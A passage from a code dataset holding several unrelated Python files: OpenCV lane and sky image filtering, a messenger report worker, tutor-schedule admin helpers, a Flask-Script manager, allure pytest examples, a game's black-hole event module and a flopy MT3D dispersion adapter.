We perform a binary and on all the other sobels \n combined[(sx_binary == 1) | ((sy_binary == 1) & (sxy_magnitude_binary == 1) & (sxy_direction_binary == 1))] = 1\n \n return combined\n \n def ToLab(self, img):#Returns the same image in LAB format\n return cv2.cvtColor(img, cv2.COLOR_RGB2LAB)\n \n def GreenFilter(self):\n \n undist_test_img_gray = self.ToLab(self.current_RoadRGB)[:,:,0]\n \n undistorted_yellow_white_hls_img_bin = self.compute_hls_white_yellow_binary(self.current_RoadRGB)\n \n sobx_best = self.abs_sobel(undist_test_img_gray, kernel_size=15, thres=(20, 120))\n \n # Saving our best sobel y result\n soby_best = self.abs_sobel(undist_test_img_gray, x_dir=False, kernel_size=15, thres=(20, 120))\n sobxy_best = self.mag_sobel(undist_test_img_gray, kernel_size=15, thres=(80, 200))\n \n sobel_combined_best = self.combined_sobels(sobx_best, soby_best, sobxy_best, undist_test_img_gray, kernel_size=15, angle_thres=(np.pi/4, np.pi/2)) \n\n color_binary = np.dstack((np.zeros_like(sobel_combined_best), sobel_combined_best, undistorted_yellow_white_hls_img_bin)) * 255\n color_binary = color_binary.astype(np.uint8)\n \n combined_binary = np.zeros_like(undistorted_yellow_white_hls_img_bin)\n combined_binary[(sobel_combined_best == 1) | (undistorted_yellow_white_hls_img_bin == 1)] = 1\n \n return color_binary,combined_binary\n\n\n def image_Quality(self, img):\n \n self.current_Image = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n self.yuv = cv2.cvtColor(self.current_Image, cv2.COLOR_RGB2YUV)\n \n # Computes stats for the sky image\n \n self.current_SkyL = self.yuv[0:self.mid, :, 0]\n self.current_SkyRGB[0:self.mid, : ] = self.current_Image[0:self.mid, : ]\n self.skylrgb[0] = np.average(self.current_SkyL[0:self.mid, :])\n self.skylrgb[1] = np.average(self.current_SkyRGB[0:self.mid, :, 0])\n self.skylrgb[2] = np.average(self.current_SkyRGB[0:self.mid, :, 1])\n self.skylrgb[3] = np.average(self.current_SkyRGB[0:self.mid, :, 2])\n \n # Computes stats for the road image\n self.current_RoadL = self.yuv[self.mid:self.y, :, 0]\n self.current_RoadRGB[:,:] = self.current_Image[self.mid:self.y, :]\n self.roadlrgb[0] = np.average(self.current_RoadL[0:self.mid, :])\n self.roadlrgb[1] = np.average(self.current_RoadRGB[0:self.mid, :, 0])\n self.roadlrgb[2] = np.average(self.current_RoadRGB[0:self.mid, :, 1])\n self.roadlrgb[3] = np.average(self.current_RoadRGB[0:self.mid, :, 2])\n # cv2.imshow(\"testing \", self.current_RoadRGB)\n # cv2.waitKey(0)\n # Sky image condition\n if self.skylrgb[0] > 160:\n self.skyImageQ = 'The Sky is : overexposed'\n elif self.skylrgb[0] < 50:\n self.skyImageQ = 'The Sky is : underexposed'\n elif self.skylrgb[0] > 143:\n self.skyImageQ = 'The Sky is : normal bright'\n elif self.skylrgb[0] < 113:\n self.skyImageQ = 'The Sky is : normal dark'\n else:\n self.skyImageQ = 'The Sky is : normal'\n\n # Sky detected weather or lighting conditions\n if self.skylrgb[0] > 128:\n if self.skylrgb[3] > self.skylrgb[0]:\n if self.skylrgb[1] > 120 and self.skylrgb[2] > 120:\n if (self.skylrgb[2] - self.skylrgb[1]) > 20.0:\n self.skyText = 'Sky Condition: tree shaded'\n else:\n self.skyText = 'Sky Condition: cloudy'\n else:\n self.skyText = 'Sky Condition: clear'\n else:\n self.skyText = 'Sky Condition: UNKNOWN SKYL>128'\n else:\n if self.skylrgb[2] > self.skylrgb[3]:\n self.skyText = 'Sky Condition: surrounded by trees'\n self.visibility = -80\n elif self.skylrgb[3] > self.skylrgb[0]:\n if (self.skylrgb[2] - self.skylrgb[1]) > 10.0:\n self.skyText = 'Sky Condition: tree shaded'\n 
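A toy check of the mask-combination rule in `combined_sobels` above: every sobel-x hit is kept, and other pixels must pass the y, magnitude and direction masks together. The arrays here are invented for illustration.

```python
import numpy as np

sx  = np.array([1, 0, 0, 1])   # sobel-x binary mask
sy  = np.array([0, 1, 0, 1])   # sobel-y binary mask
mag = np.array([0, 1, 0, 1])   # gradient-magnitude mask
ang = np.array([0, 1, 1, 1])   # gradient-direction mask

combined = np.zeros_like(sx)
combined[(sx == 1) | ((sy == 1) & (mag == 1) & (ang == 1))] = 1
print(combined)  # -> [1 1 0 1]
```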
else:\n self.skyText = \\\n 'Sky Condition: very cloudy or under overpass'\n else:\n self.skyText = 'Sky Condition: UNKNOWN!'\n\n self.roadbalance = self.roadlrgb[0] / 10.0\n\n # Detemines the conditions of the road \n if self.roadlrgb[0] > 160:\n self.roadImageQ = 'Road Image: overexposed'\n elif self.roadlrgb[0] < 50:\n self.roadImageQ = 'Road Image: underexposed'\n elif self.roadlrgb[0] > 143:\n self.roadImageQ = 'Road Image: normal bright'\n elif self.roadlrgb[0] < 113:\n self.roadImageQ = 'Road Image: normal dark'\n else:\n self.roadImageQ = 'Road Image: normal'\n\n def Background_sub(self, imgs):\n img = cv2.cvtColor(imgs, cv2.COLOR_BGR2GRAY)\n img = cv2.resize(img ,(self.x, self.y), None)\n res = cv2.createBackgroundSubtractorMOG2()\n return cv2.bitwise_or(res.apply(img) , img)\n \n ## Define a function to masks out yellow lane lines\n def image_only_yellow_white(self, img):\n # setup inRange to mask off everything except white and yellow\n lower_yellow_white = np.array([140, 140, 64])\n upper_yellow_white = np.array([255, 255, 255])\n mask = cv2.inRange(img, lower_yellow_white, upper_yellow_white)\n self.all_yellow = cv2.bitwise_and(img, img, mask=mask)\n\n \n\n # Define a function that applies Sobel x or y, then takes an absolute value and applies a threshold.\n def abs_sobel_thresh(self, img, orient='x', thresh=(40, 255)):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n if orient == 'x':\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0)\n abs_sobel = np.absolute(sobelx)\n if orient == 'y':\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1)\n abs_sobel = np.absolute(sobely)\n scaled_sobel = np.uint8(255*abs_sobel/np.max(abs_sobel))# Rescale back to 8 bit integer\n # Create a copy and apply the threshold\n ret, binary_output = cv2.threshold(scaled_sobel, thresh[0], thresh[1], cv2.THRESH_BINARY)\n return binary_output\n\n # Define a function that applies Sobel x and y,then computes the magnitude of the gradient and applies a threshold\n def mag_thresh(self, img, sobel_kernel=3, mag_thresh=(40, 255)):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n gradmag = np.sqrt(sobelx**2 + sobely**2)\n scale_factor = np.max(gradmag)/255\n gradmag = (gradmag/scale_factor).astype(np.uint8)\n ret, mag_binary = cv2.threshold(gradmag, mag_thresh[0], mag_thresh[1], cv2.THRESH_BINARY)\n return mag_binary\n\n # Define a function that applies Sobel x and y, then computes the direction of the gradient and applies a threshold.\n def dir_threshold(self, img, sobel_kernel=3, thresh=(0, np.pi/2)):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n with np.errstate(divide='ignore', invalid='ignore'):\n dirout = np.absolute(np.arctan(sobely/sobelx))\n # 5) Create a binary mask where direction thresholds are met\n dir_binary = np.zeros_like(dirout).astype(np.float32)\n dir_binary[(dirout > thresh[0]) & (dirout < thresh[1])] = 1\n # 6) Return this mask as your binary_output image\n # update nan to number\n np.nan_to_num(dir_binary)\n # make it fit\n dir_binary[(dir_binary>0)|(dir_binary<0)] = 128\n return dir_binary.astype(np.uint8)\n\n # Define a function that thresholds the S-channel of HLS\n def hls_s(self, img, thresh=(0, 255)):\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n s = hls[:,:,2]\n retval, s_binary = cv2.threshold(s.astype('uint8'), thresh[0], thresh[1], 
cv2.THRESH_BINARY)\n return s_binary\n\n # Define a function that thresholds the H-channel of HLS\n def hls_h(self, img, thresh=(0, 255)):\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n h = hls[:,:,0]\n retval, h_binary = cv2.threshold(h.astype('uint8'), thresh[0], thresh[1], cv2.THRESH_BINARY)\n return h_binary\n \n \n def thresholding(self,img):\n \n img_to_gray = cv2.cvtColor(img ,cv2.COLOR_BGR2GRAY)#makes image gray\n kernel = np.ones((5,5))\n img_g_blur = cv2.GaussianBlur(img_to_gray, (5, 5),0)\n img_current_RoadEdge = cv2.Canny(img_g_blur, 50, 150 )\n white_yellow ,white,yellow = self.Color_filter(img)\n img_current_RoadEdge_yellow = cv2.Canny(white_yellow, 50, 150 )\n #dial and erode are irrelevant but improves the results a little\n img_dial = cv2.dilate(img_current_RoadEdge,kernel,iterations=1)\n img_erode = cv2.erode(img_dial,kernel,iterations=1)\n to_procees = cv2.Canny(white_yellow, 50, 100)\n combined_img = cv2.bitwise_or(to_procees, img_erode)\n \n return combined_img,img_current_RoadEdge_yellow,white_yellow\n \n def Color_filter(self, img):\n hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n \n # Range for lower red\n red_lower = np.array([0,120,70])\n red_upper = np.array([10,255,255])\n mask_red1 = cv2.inRange(hsv, red_lower, red_upper)\n # Range for upper range\n red_lower = np.array([170,120,70])\n red_upper = np.array([180,255,255])\n mask_red2 = cv2.inRange(hsv, red_lower, red_upper)\n mask_red = mask_red1 + mask_red2\n \n \n # Range for upper range\n yellow_lower = np.array([20, 100, 100])\n yellow_upper = np.array([30, 255, 255])\n White_lower = np.array([0, 0, 200])\n White_upper = np.array([255, 255, 255])\n \n mask_yellow = cv2.inRange(hsv, yellow_lower, yellow_upper)\n mask_white = cv2.inRange(hsv,White_lower,White_upper)\n \n img_yellow = cv2.bitwise_and(img, img, mask=mask_yellow)\n img_white = cv2.bitwise_and(img, img, mask=mask_white)\n red_output = cv2.bitwise_and(img, img, mask=mask_red)\n \n red_ratio=(cv2.countNonZero(mask_red))/(img.size/3)\n yellow_ratio =(cv2.countNonZero(mask_yellow))/(img.size/3)\n white_ratio = (cv2.countNonZero(mask_white))/(img.size/3)\n \n Yellowinimage = np.round(yellow_ratio*100, 2)\n whiteinimage = np.round(white_ratio*100, 2)\n Redinimage = np.round(red_ratio*100, 2)\n \n white_yellow = cv2.bitwise_or(img_white, img_yellow)\n \n return white_yellow,img_white,img_yellow\n \n \n ################################## STILL TO TEST ############################\n # A function to cut the image in half horizontally\n def Half_Img(self, image, half=0):\n if half == 0:\n if len(image.shape) < 3:\n newimage = np.copy(image[self.mid:self.y, :])\n else:\n newimage = np.copy(image[self.mid:self.y, :, :])\n else:\n if len(image.shape) < 3:\n newimage = np.copy(image[0:self.mid, :])\n else:\n newimage = np.copy(image[0:self.mid, :, :])\n return newimage\n \n def miximg(self, img1, img2, α=0.8, β=1., λ=0.):\n return cv2.addWeighted(img1.astype(np.uint8),\n α, img2.astype(np.uint8), β, λ)\n \n \n def horizonDetect(self, debug=False, thresh=50):\n if not self.horizonFound:\n img = np.copy(self.current_RoadRGB).astype(np.uint8)\n magch = self.mag_thresh(img, sobel_kernel=9, mag_thresh=(30, 150))\n horizonLine = 50\n while not self.horizonFound and horizonLine < int(self.y / 2):\n magchlinesum = np.sum(magch[horizonLine:(horizonLine + 1), :]).astype(np.float32)\n \n if magchlinesum > (self.x * thresh):\n self.horizonFound = True\n self.roadhorizon = horizonLine + int(self.y / 2)\n else:\n horizonLine += 1\n\n def drawHorizon(self, image):\n horizonLine = 
self.roadhorizon\n image[horizonLine:(horizonLine + 1), :, 0] = 255\n image[horizonLine:(horizonLine + 1), :, 1] = 255\n image[horizonLine:(horizonLine + 1), :, 2] = 0\n\n def balanceEx(self):\n # separate each of the RGB color channels\n r = self.current_RoadRGB[:, :, 0]\n g = self.current_RoadRGB[:, :, 1]\n b = self.current_RoadRGB[:, :, 2]\n # Get the Y channel (Luma) from the YUV color space\n # and make two copies\n yo = np.copy(self.current_RoadL[:, :]).astype(np.float32)\n yc = np.copy(self.current_RoadL[:, :]).astype(np.float32)\n # use the balance factor calculated previously to calculate the\n # corrected Y\n yc = (yc / self.roadbalance) * 8.0\n # make a copy and threshold it to maximum value 255.\n lymask = np.copy(yc)\n lymask[(lymask > 255.0)] = 255.0\n # create another mask that attempts to masks yellow road markings.\n uymask = np.copy(yc) * 0\n # subtract the thresholded mask from the corrected Y.\n # Now we just have peaks.\n yc -= lymask\n # If we are dealing with an over exposed image\n # cap its corrected Y to 242.\n if self.roadlrgb[0] > 160:\n yc[(b > 254) & (g > 254) & (r > 254)] = 242.0\n # If we are dealing with a darker image\n # try to pickup faint blue and cap them to 242.\n elif self.roadlrgb[0] < 128:\n yc[(b > self.roadlrgb[3]) & (yo > 160 + (self.roadbalance * 20))] = 242.0\n else:\n yc[(b > self.roadlrgb[3]) & (yo > 210 + (self.roadbalance * 10))] = 242.0\n # attempt to mask yellow lane lines\n uymask[(b < self.roadlrgb[0]) & (r > self.roadlrgb[0]) & (g > self.roadlrgb[0])] = 242.0\n # combined the corrected road luma and the masked yellow\n yc = self.miximg(yc, uymask, 1.0, 1.0)\n # mix it back to the original luma.\n yc = self.miximg(yc, yo, 1.0, 0.8)\n # resize the image in an attempt to get the lane lines to the bottom.\n yc[int((self.y / 72) * 70):self.y, :] = 0\n self.yuv[self.mid:self.y, :, 0] = yc.astype(np.uint8)\n self.yuv[(self.y - 40):self.y, :, 0] = \\\n yo[(self.mid - 40):self.mid, :].astype(np.uint8)\n # convert back to RGB.\n self.current_RoadRGB = cv2.cvtColor(self.yuv[self.mid:self.y, :, :], cv2.COLOR_YUV2RGB)\n \n # def yellow_colorDetection(self , image):\n \n # hsv = cv2.cvtColor(image,cv2.COLOR_BGR2HSV)\n # '''Red'''\n # # Range for lower red\n # red_lower = np.array([0,120,70])\n # red_upper = np.array([10,255,255])\n # mask_red1 = cv2.inRange(hsv, red_lower, red_upper)\n # # Range for upper range\n # red_lower = np.array([170,120,70])\n # red_upper = np.array([180,255,255])\n # mask_red2 = cv2.inRange(hsv, red_lower, red_upper)\n # mask_red = mask_red1 + mask_red2\n # red_output = cv2.bitwise_and(image, image, mask=mask_red)\n # red_ratio=(cv2.countNonZero(mask_red))/(image.size/3)\n # print(\"Red in image\", np.round(red_ratio*100, 2))\n # '''yellow'''\n # # Range for upper range\n # yellow_lower = np.array([20, 100, 100])\n # yellow_upper = np.array([30, 255, 255])\n # mask_yellow = cv2.inRange(hsv, yellow_lower, yellow_upper)\n # yellow_output = cv2.bitwise_and(image, image, mask=mask_yellow)\n # yellow_ratio =(cv2.countNonZero(mask_yellow))/(image.size/3)\n # print(\"Yellow in image\", np.round(yellow_ratio*100, 2))\n \n # return yellow_output\n \n # A function to cut the image in half horizontally\n def Half_Img(self, image, half=0):\n if half == 0:\n if len(image.shape) < 3:\n newimage = np.copy(image[self.mid:self.y, :])\n else:\n newimage = np.copy(image[self.mid:self.y, :, :])\n else:\n if len(image.shape) < 3:\n newimage = np.copy(image[0:self.mid, :])\n else:\n newimage = np.copy(image[0:self.mid, :, :])\n return 
newimage\n \n ","sub_path":"utils5/image_Filter.py","file_name":"image_Filter.py","file_ext":"py","file_size_in_byte":22478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152571009","text":"import traceback\nimport ConfigParser\nimport requests\nimport json\nfrom datetime import datetime\nfrom pytz import timezone\nfrom time import sleep\nfrom messengers.messengers import MESSENGERS\nfrom helpers.analytic_helper import AnalyticHelper\nfrom helpers.log_helper import LogHelper\nfrom helpers.api_helper import APIHelper\n\n\nclass WorkerHelper(object):\n lh = LogHelper()\n api = APIHelper()\n\n def worker(self):\n \"\"\"Worker.\"\"\"\n while True:\n task = self.api.get_task()\n if task is not None:\n self.process_task(task)\n else:\n sleep(3)\n\n def process_task(self, task):\n \"\"\"Process the task.\"\"\"\n try:\n messenger = MESSENGERS[task[\"messenger\"]](task[\"login\"], task[\"password\"], task[\"_id\"], self.api.token, task.get(\"timezone_offset\", 0))\n if messenger.error:\n messenger.exit()\n else:\n messenger.chose_contact()\n if messenger.contact_id is None:\n messenger.exit()\n else: \n messages = messenger.get_messages(task[\"date_from\"], task[\"date_to\"])\n contact = messenger.get_contact()\n messenger.exit()\n report = AnalyticHelper(messages, task[\"date_from\"], task[\"date_to\"]).get_report()\n report[\"contact\"] = contact\n report[\"messenger\"] = task[\"messenger\"]\n report[\"report_id\"] = task[\"_id\"]\n report[\"user_id\"] = task[\"user_id\"]\n self.api.add_report(report)\n except:\n # self.lh.log(traceback.format_exc())\n self.lh.capture_exception()\n","sub_path":"worker/helpers/worker_helper.py","file_name":"worker_helper.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339239381","text":"import pprint, sys, shutil, os, openpyxl, json\n\nsys.path.append(os.path.join('..', 'app'))\nimport settings, functions\n\ndef getSettingsFromApp():\n courseNames = settings.courseNames\n tutorCourse = settings.tutorCourse\n scheduleFileName = settings.SCHEDULE_FILE_NAME\n\n return (tutorCourse, courseNames, scheduleFileName)\n\ndef writeSettingsTempFile(tutorCourse, courseNames, schedule, schedule_file_name):\n '''Write temporary settings file which will replace the settings file\n in the app\n '''\n fileObject = open('settingsTemp.py', 'w')\n fileObject.write('tutorCourse = ' + pprint.pformat(tutorCourse) + '\\n'*2)\n fileObject.write('courseNames = ' + pprint.pformat(courseNames) + '\\n'*2)\n fileObject.write('schedule = ' + pprint.pformat(schedule) + '\\n'*2)\n fileObject.write('SCHEDULE_FILE_NAME = ' + pprint.pformat(str(schedule_file_name)) + '\\n'*2)\n\n fileObject.close()\n\ndef writeSettingsFile():\n '''Write the settings file'''\n # Rewriting local settings.py file\n appPath = os.path.join('..', 'app')\n shutil.copy('settingsTemp.py', os.path.join(appPath, 'settings.py'))\n\ndef writeSettingsJson(tutorCourse, courseNames, schedule):\n with open('settings.json', 'w') as io:\n io.write('{\\n')\n io.write('\\\"schedule\\\" :' + json.dumps(schedule, sort_keys=True, indent=4) + ',\\n')\n io.write('\\\"tutorCourse\\\" :' + json.dumps(tutorCourse, sort_keys=True, indent=4) + ',\\n')\n io.write('\\\"courseNames\\\" :' + json.dumps(courseNames, sort_keys=True, indent=4) + '\\n')\n io.write('}')\n io.close()\n\ndef removeInstance(targetDictionary, choice):\n '''Removing instance choice from targetDictionary'''\n 
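The WorkerHelper.worker() loop in the record above reduces to a simple poll-or-sleep pattern; a minimal stand-alone version with the task source stubbed out (`get_task` and `process_task` are placeholders here, not the real API helpers):

```python
from time import sleep

def run_worker(get_task, process_task):
    # poll for work; back off for a few seconds when the queue is empty
    while True:
        task = get_task()
        if task is not None:
            process_task(task)
        else:
            sleep(3)
```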
targetDictionary.pop(choice, None)\n\ndef removeCourse(tutorDictionary, tutorName, courseToRemove):\n tutorDictionary[tutorName].remove(courseToRemove)\n\ndef addCourse(courseDictionary, description, code):\n '''Adding new course instance with description and course code as arguments\n to the courseDictionary\n '''\n key = str(code + ': ' + description)\n value = str(code)\n\n courseDictionary.update({key:value})\n\ndef addNewTutor(tutorDictionary, tutorName):\n '''Adding new tutor into a dictionary'''\n tutorDictionary[str(tutorName)] = ['0']\n\n\ndef isAlreadyTutoring(course, tutorName, tutorDictionary):\n '''If course is in tutorDictionary under tutorName or 'Everyone' keys return True'''\n if course in tutorDictionary[tutorName] or course in tutorDictionary['Everyone']:\n return True\n else:\n return False\n\ndef getCoursesToAdd(tutorDictionary, courseDictionary, tutorName):\n '''Returns list of courses which may be added to a tutorName'''\n return sorted([course for course in courseDictionary.values() if not isAlreadyTutoring(course, tutorName, tutorDictionary)])\n\n\ndef addCoursesToTutor(tutorDictionary, courseDictionary, tutorName, courses):\n '''Adding list of courses to a tutorName key in the list of tutors'''\n for course in courses:\n tutorDictionary[tutorName].append(course)\n\ndef getScheduleFileUrl(scheduleFileName):\n '''Getting schedule file url using credentials from the app'''\n return functions.getScheduleUrlFromDrive(scheduleFileName)\n\ndef uploadSettingsToDrive():\n functions.uploadSettingsToDrive()\n\ndef getScheduleDictionary():\n '''Returns a schedule dictionary after reading schedule Excel file'''\n functions.updateScheduleFromDrive()\n excel_file = openpyxl.load_workbook('tutorSchedule.xlsx')\n week_days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday']\n hours = list(idx for idx in range(9, 21)) # Creating a list with possible hours 9 - 20\n\n schedule = dict((day, dict()) for day in week_days)\n\n # Going through each worksheet in the excel file (one week day)\n for day in week_days:\n work_sheet = excel_file.get_sheet_by_name(day)\n\n # Setting a starting point in Excel file\n start_time_row = 4\n start_column = 2\n\n current_time_row = 4\n\n for hour in hours:\n # Creating a list that will hold tutor names in the day dictionary under hour key\n schedule[day][hour] = list()\n\n current_column = 2\n\n # Going through every row and collecting tutor names\n while True:\n current_cell = work_sheet.cell(row = current_time_row, column = current_column)\n\n # if cell is empty add '0' and break out of the loop\n if isinstance(current_cell.value, type(None)):\n schedule[day][hour].append('0')\n break\n else:\n schedule[day][hour].append(str(current_cell.value))\n current_column += 1\n # Outside of the while loop increment current row\n current_time_row += 1\n\n return schedule\n","sub_path":"admin/admin_functions.py","file_name":"admin_functions.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"596790203","text":"from flask_script import Manager\nfrom app import app\nimport sqlite3\nfrom models import User\nmanager = Manager(app)\n\n# run with: python3 manage.py hello\n@manager.command\ndef hello():\n\tprint('hello manager')\n\n\n\n# python manage.py hello_world\n@manager.option('-m','--msg',dest='msg_val',default='world')\ndef hello_world(msg_val):\n\tprint('hello' + msg_val)\n\n@manager.command\ndef init_db():\n\tsql = 'create table user (id INT,name TEXT)'\n\tconn = 
sqlite3.connect('meng.db')\n\tcursor = conn.cursor()\n\tcursor.execute(sql)\n\tconn.commit()\n\tcursor.close()\n\tconn.close()\n\n@manager.command\ndef save():\n\tuser = User(2,'liang')\n\tuser.save()\n@manager.command\ndef query_all():\n\tusers = User.query()\n\tfor user in users:\n\t\tprint(user)\n\n\nif __name__ == '__main__':\n\tmanager.run()","sub_path":"flaskPractice/flaskScript/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"80608576","text":"import allure\nimport pytest\nimport ddt\nimport json,requests\n\n\n\n@pytest.fixture()\ndef load_data():\n a = 2\n return a\n@allure.description_html(\"\"\"\n

Test with some complicated html description by ZHOUPENGYANG</h1>\n\n<table style=\"width:100%\">\n <tr>\n <th>Firstname</th>\n <th>Lastname</th>\n <th>Age</th>\n </tr>\n <tr>\n <td>William</td>\n <td>Smith</td>\n <td>50</td>\n </tr>\n <tr>\n <td>Vasya</td>\n <td>Jackson</td>\n <td>94</td>\n </tr>\n</table>
\n\"\"\")\n\ndef test_html_description(load_data):\n\n assert load_data == 2\n\n@allure.description(\"\"\"\nMultiline test description.\nThat comes from the allure.description decorator.\n\nNothing special about it.\n\"\"\")\ndef test_description_from_decorator():\n assert 42 == int(6 * 7)\n\n\ndef test_unicode_in_docstring_description():\n \"\"\"Unicode in description.\n\n Этот тест проверяет юникод.\n\n 你好伙计.\n \"\"\"\n assert 42 == int(6 * 7)\n@allure.description_html(\"\"\"\n

Zhang Yiling 世界で最も美しい人たち

\n\"\"\")\ndef test_request_api():\n \"\"\"\n HELLO 聪明猪\n \"\"\"\n url = \"U URL\"\n response = requests.request(\"get\",url)\n SYLY_data = json.loads(response.text)\n for x in SYLY_data:\n if x[\"SYL_Y\"] == 23.1259:\n print(x[\"SYL_Y\"])\n else:\n print(\"!=23.1259\")\n # print(\"SUCCESS\")\n # else:\n # print(\"AGAIN!\")\n","sub_path":"allure_case.py","file_name":"allure_case.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"595478333","text":"#coding=utf-8\n\n'''\n活动:黑洞探险\n'''\n\nNPC_MAP_POINTS = {\n\t\t70001: ((60,25),(105,22),(101,40),(104,60),(102,80),(53,74),(17,48),(5,59),(13,101),(35,125),(52,103),(74,91),(68,65)),\n\t\t3: ((7,49),(19,73),(23,95),(41,77),(58,77),(75,90),(82,53),(78,16),(49,9),(36,15)),\n}\nMAP_ID = 5002\n\nfrom yuanneng import scheduler_manager\nfrom yuanneng import cfg\nfrom yuanneng.map import callback_manager\nfrom time import *\nfrom yuanneng import utils\nfrom yuanneng.proto import map_pb2\nfrom yuanneng.proto import role_pb2\nfrom yuanneng import mc\nfrom yuanneng.cmd import *\nfrom random import *\n\n\ndef init():\n scheduler_manager.add_hour_scheduler(start, -1)\n global m_map\n from yuanneng.map import map as m_map\n global LEADER_IDX, MEMBER_IDX\n from yuanneng.team import LEADER_IDX, MEMBER_IDX\n\ndef start():\n hour = localtime()[3]\n appear = hour % 2 == 0\n for map_id in NPC_MAP_POINTS:\n if m_map.query_process(map_id) != cfg.gpid:\n continue\n if (map_id, False) not in m_map.map_table:\n if appear:\n callback_manager.regist_map_cb(map_id, add_npc_to_map)\n else:\n callback_manager.remove_map_cb(map_id, add_npc_to_map)\n continue\n map_obj = m_map.map_table[(map_id, False)]\n if appear:\n add_npc_to_map(map_obj)\n else:\n map_obj.clear_heidong_npcs()\n appear = not appear\n\nclass PlayerHeidong(object):\n def add_heidong_count(self, num = 1):\n old_count = self.heidong_count\n self.heidong_count += num\n if old_count < 1 and self.heidong_count >= 1:\n #TODO 添加称号和成就\n pass\n if old_count < 10 and self.heidong_count >= 10:\n #TODO 添加称号和成就\n pass\n\nclass MapHeidong(object):\n ''' 普通地图上的黑洞npc相关处理 '''\n def __init__(self):\n self.heidong_npc = {}\n\n def clear_heidong_npcs(self):\n for gid in self.heidong_npc:\n self.recy_id(gid)\n res = map_pb2.MapRemovedRes()\n res.type = 2\n res.id = gid\n self.tell_room('C04', 1, res)\n self.heidong_npc.clear()\n\n def heidong_check(self, heidong_id, obj):\n if heidong_id not in self.heidong_npc:\n return False\n x, y = self.heidong_npc[heidong_id]\n if utils.get_dis(x, y, obj.x, obj.y) > 15:\n return False\n return True\n\n def remove_heidong(self, id):\n self.recy_id(id)\n res = map_pb2.MapRemovedRes()\n res.type = 2\n res.id = id\n self.tell_room('C04', 1, res)\n del self.heidong_npc[id]\n\n def add_heidong_npcs(self, points):\n res = map_pb2.MapBroadRes()\n for pt in points:\n gid = self.get_available_id()\n self.heidong_npc[gid] = pt\n pb_item = res.items.add()\n pb_item.x, pb_item.y = pt\n pb_item.status = 0\n pb_item.id = gid\n pb_item.type = 2\n pb_item.tid = 50045\n self.tell_room('C01', 1, res)\n\n def build_map_broad_heidong(self, pb_items):\n for heidong_id, (x,y) in self.heidong_npc.iteritems():\n pb_item = pb_items.add()\n pb_item.x, pb_item.y = x, y\n pb_item.status = 0\n pb_item.id = heidong_id\n pb_item.type = 2\n pb_item.tid = 50045\n\ndef add_npc_to_map(map_obj):\n tid = map_obj.tid\n if tid not in NPC_MAP_POINTS:\n return\n points = list(NPC_MAP_POINTS[tid])\n shuffle(points)\n count = 
randint(5,10)\n map_obj.add_heidong_npcs(points[:count])\n\n@route('J08', require_para = role_pb2.RoleIdReq)\n@cmd_exception_catch()\ndef enter_heidong(obj, data):\n if obj.level < 20:\n return\n npc_id = data.id\n map_obj = obj.map_obj\n if not map_obj.heidong_check(npc_id, obj):\n return\n born = m_map.query_born(MAP_ID)\n obj.lv_arg = (1, obj.level)\n if not obj.team:\n return\n team_id = mc.get_player_team(obj.gid)\n if not team_id:\n return\n team = mc.get_team(team_id)\n if not team:\n return\n #没有已经存在的副本\n team_copy = mc.get_team_copy(team_id)\n if team_copy:\n return\n if obj.gid != team[LEADER_IDX]:\n return\n mate_objs = []\n members = team[MEMBER_IDX]\n all_members = set()\n total_count = 1\n total_lv = obj.level\n for mate in members:\n mate_obj = map_obj.get_obj(mate)\n if not mate_obj or mate_obj.level < 20 or utils.get_dis(obj.x,obj.y,mate_obj.x,mate_obj.y) >= 15:\n continue\n total_count += 1\n total_lv += mate_obj.level\n mate_objs.append(mate_obj)\n all_members.add(mate)\n if total_count < 2:\n return\n from yuanneng.transmit import transmit_to\n map_obj.remove_heidong(npc_id)\n all_members.add(obj.gid)\n team_copy = [MAP_ID, all_members]\n mc.set_team_copy(team_id,team_copy)\n obj.lv_arg = (total_count, total_lv / total_count)\n mc.set_heidong_enter_p(obj.gid, map_obj.tid, obj.x, obj.y)\n transmit_to(obj,MAP_ID,born[0],born[1])\n for mate_obj in mate_objs:\n mate_obj.lv_arg = (total_count, total_lv / total_count)\n mc.set_heidong_enter_p(mate_obj.gid, map_obj.tid, mate_obj.x, mate_obj.y)\n transmit_to(mate_obj,MAP_ID,born[0],born[1])\n\n","sub_path":"yuanneng/activity/heidong.py","file_name":"heidong.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339324685","text":"import numpy as np\nimport flopy.mt3d as mt\n\n\nclass DspAdapter:\n _data = None\n\n def __init__(self, data):\n self._data = data\n\n def validate(self):\n # should be implemented\n # for key in content:\n # do something\n # return some hints\n pass\n\n def is_valid(self):\n # should be implemented\n # for key in content:\n # do something\n # return true or false\n return True\n\n def merge(self):\n default = self.default()\n for key in self._data:\n default[key] = self._data[key]\n return default\n\n def get_package(self, _mt):\n content = self.merge()\n return mt.Mt3dDsp(\n _mt,\n **content\n )\n\n @staticmethod\n def default():\n default = {\n 